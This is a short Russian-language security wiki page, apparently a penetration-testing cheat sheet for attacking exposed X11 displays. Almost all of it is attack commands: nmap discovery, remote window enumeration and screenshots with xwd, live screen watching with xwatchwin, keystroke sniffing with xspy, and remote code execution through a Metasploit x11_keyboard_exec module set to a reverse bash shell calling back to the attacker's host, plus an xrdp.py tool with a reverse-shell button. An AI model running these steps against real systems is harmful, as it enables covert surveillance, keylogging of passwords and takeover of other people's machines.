X11 all
Материал из InformationSecurity WIKI
Содержание
Разведка
Поиск сервиса
nmap
nmap target -p 6000 --script x11-accessПроверка подключения
xdpyinfo
xdpyinfo -display <ip>:<display>Информация об окнах
xwininfo
xwininfo -root -tree -display target:0Атаки
Скриншоты
xwd
xwd -root -screen -silent -display target:0 > screenshot.xwd
convert screenshot.xwd screenshot.pngСлежка за экраном
xwatchwin
./xwatchwin target:0 -w window_id
Сниффер
Сниффать нажатия
xspy
xspy target
RCE
x11_keyboard_exec
use unix/x11/x11_keyboard_exec
set rhost target
set payload cmd/unix/reverse_bash
set lhost myip
set lport myport
set time_wait 10
runxrdp
./xrdp.py <target:0> --no-dispТам будет кнопка R-Shell
